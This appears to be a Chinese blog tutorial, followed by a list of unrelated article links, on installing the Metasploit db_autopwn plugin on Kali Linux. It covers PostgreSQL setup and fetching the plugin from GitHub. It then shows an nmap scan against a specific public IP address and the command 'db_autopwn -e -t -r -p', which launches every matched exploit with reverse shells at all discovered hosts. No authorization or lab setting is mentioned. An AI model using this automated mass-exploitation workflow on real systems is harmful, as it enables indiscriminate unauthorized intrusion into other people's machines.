Metasploit自动攻击模块
Metasploit自动攻击模块
Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-q Disable exploit module output
-R [rank] Only run modules with a minimal rank
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regex
-T [secs] Maximum runtime for any exploit in seconds wget https://raw.githubusercontent.com/hahwul/metasploit-db_autopwn/master/db_autopwn.rb
mv db_autopwn.rb /usr/share/metasploit-framework/plugins/
ls -alh /usr/share/metasploit-framework/plugins/ db_status
db_disconnect
db_status
db_connect msf3:msf3@127.0.0.1/msf3
db_status workspace
workspace -a test1
workspace
workspace test1 db_nmap -sV -O -v -T 202.193.58.13
hosts
services load db_autopwn
help db_autopwn
db_autopwn -e -t -r -p
环境:kali-linux-2017.3-vm-amd64
一、安装postgresql数据库
apt-get install postgresql
apt-get install rubygems libpq-dev
apt-get install libreadline-dev
apt-get install libssl-dev
apt-get install libpq5
apt-get install ruby-dev
apt-get install libpq-dev
直接全部copy到kali中执行即可
二、自动配置数据库
service postgres start 启动服务
msfdb init 自动创建数据库、用户、密码
三、手动配置数据库
passwd postgres 修改postgresql数据库密码
su postgres 进入数据库
createuser hello –P 创建用户hello,并设置密码
createdb --owner=hello db_hello 给用户hello创建一个数据库db_hello
psql db_hello 进入db_hello数据库
四、安装db_autopwn.rb模块
cd /usr/share/metasploit-framework/plugins 定位到msf插件目录
git clone https://github.com/hahwul/metasploit-db_autopwn.git 安装db_autopwn
cd metasploit-db_autopwn
mv db_autopwn.rb /usr/share/metasploit-framework/plugins
打开msfconsole,查看db_autopwn是否安装成功,执行如下命令:
load db_autopwn 出现下图结果说明安装成功
五、借助db_autopwn进行自动加载模块进行攻击
msfconsole
use auxiliary/scanner/portscan/tcp 调用tcp扫描模块
set rhosts 192.168.1.28
set threads 10
exploit
自动加载模块
db_autopwn –t –p –r –e
最新文章
- 转I2s
- 复制文件的bat脚本
- LCA最近公共祖先 Tarjan离线算法
- something about css locating.
- python学习好书推荐
- asp.net 多个域名重定向,在web.Config中配置
- 【HDOJ】2896 病毒侵袭
- CSS控制LI行字符溢出用省略号取代
- GetTextMetrics
- ORM映射设计思想
- Editplus配置java运行环境以及其他需求的简单设置
- gops - Go语言程序查看和诊断工具
- MPU9250九轴陀螺仪--读接口数据
- nginx集成环境下载
- BZOJ4012[HNOI2015]开店——树链剖分+可持久化线段树/动态点分治+vector
- 界面为ScrollView时打开界面会自动滚动到底部之解决方法
- UI设计如何做好排版?你可以学习一下格式塔原理
- codeforces 1140E Palindrome-less Arrays
- PHP-FPM详解
- .NET:CLR via C# The CLR’s Execution Model